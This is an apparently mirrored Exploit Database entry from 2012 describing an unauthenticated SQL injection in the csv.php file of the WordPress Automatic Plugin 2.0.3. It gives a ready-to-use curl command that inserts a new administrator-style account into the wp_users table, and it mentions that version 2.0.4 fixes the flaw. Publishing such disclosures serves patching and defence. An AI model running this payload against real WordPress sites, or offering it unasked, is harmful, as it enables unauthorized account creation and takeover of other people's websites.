WordPress Plugin Automatic 2.0.3 – SQL Injection

• Exploit Database
• 133 阅读

• 作者： nick58
  日期： 2012-06-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19187/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  Title: ====== Wordpress Automatic Plugin v2.0.3 SQL Injection   Date: ===== 2012-06-15   Website: =========== http://codecanyon.net/item/wordpress-automatic-plugin/1904470   Introduction: ============= Wordpress automatic plugin posts quality targeted articles, Amazon Products, clickbank Products, Youtube Videos and feeds posts on auto-pilot. just install and leave, it will work 24/7* to blog for you .   Exploit Details: ================ The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries   Using this cURL command a user can send this POST data which will create a new login: $ curl --data q=INSERT INTO <code>wp_users</code> (<code>user_login</code>, <code>user_pass</code>, <code>user_email</code>) VALUES (&apos;test&apos;, &apos;123456&apos;, &apos;jblow@gmail.com&apos;) http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php   Fix: ==== The author of this plugin has released a fix for this vulnerability and users are urged to upgrade to v2.0.4.